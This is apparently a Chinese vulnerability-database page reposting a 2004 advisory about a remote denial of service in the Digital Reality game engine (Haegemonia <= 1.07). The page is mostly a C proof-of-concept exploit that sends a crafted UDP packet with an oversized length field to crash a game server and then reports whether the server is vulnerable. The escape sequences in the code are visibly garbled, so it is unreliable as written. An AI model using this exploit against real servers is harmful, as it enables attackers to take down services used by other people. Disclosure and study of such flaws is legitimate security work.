Digital Reality Game Engine 1.0.x – Remote Denial of Service
漏洞ID | 1054395 | 漏洞类型 | |
发布时间 | 2004-02-24 | 更新时间 | 2004-02-24 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9736/info
It has been reported that the Digital Reality Game engine is prone to a remote denial of service vulnerability. This issue is due to a failure of the application to validate packet data size input supplied by a client.
The immediate consequences of a successful attack will cause the affected server to crash. It has been conjectured that this issue may also be leveraged to execute arbitrary code in the context of the affected application, however this has not been verified.
/*
by Luigi Auriemma
UNIX & WIN VERSION
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PORT 19664
#define TIMEOUT 5
#define SEND(x) if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr *)&peer, psz)
< 0) std_err();
#define RECV if(recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz)
< 0) std_err();
#define JOIN "x00x00"
#define BOOM "x10x00x00x03x0bx01"
/* boom */ "xffxffxffxff"
/* message */ "boomyeah"
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
int sd,
psz;
u_short port = PORT;
u_char *buff;
struct sockaddr_in peer;
setbuf(stdout, NULL);
fputs("n"
"Haegemonia <= 1.07 remote server crash "VER"n"
"by Luigi Auriemman"
"e-mail: [email protected]"
"web: http://aluigi.altervista.orgn"
"n", stdout);
if(argc < 2) {
printf("nUsage: %s <server> [port(%u)]n"
"n", argv[0], PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);
printf("nStarting attack versus %s:%hunn",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
fputs("- sending JOIN packetn", stdout);
SEND(JOIN);
if(timeout(sd) < 0) {
fputs("nError: socket timeout, server is probably not onlinen", stdout);
exit(1);
}
buff = malloc(BUFFSZ);
if(!buff) std_err();
RECV;
fputs("- sending BOOM packetn", stdout);
SEND(BOOM);
if(timeout(sd) < 0) {
fputs("nServer IS vulnerable!!!!!!!n", stdout);
} else {
fputs("nServer doesn't seem to be vulnerablen", stdout);
}
close(sd);
return(0);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("nError: Unable to resolve hostname (%s)n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("nError");
exit(1);
}
#endif
相关推荐: HP Remote Watch权限许可和访问控制漏洞
HP Remote Watch权限许可和访问控制漏洞 漏洞ID 1207634 漏洞类型 未知 发布时间 1996-10-01 更新时间 1996-10-01 CVE编号 CVE-1999-0246 CNNVD-ID CNNVD-199610-002 漏洞平台…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666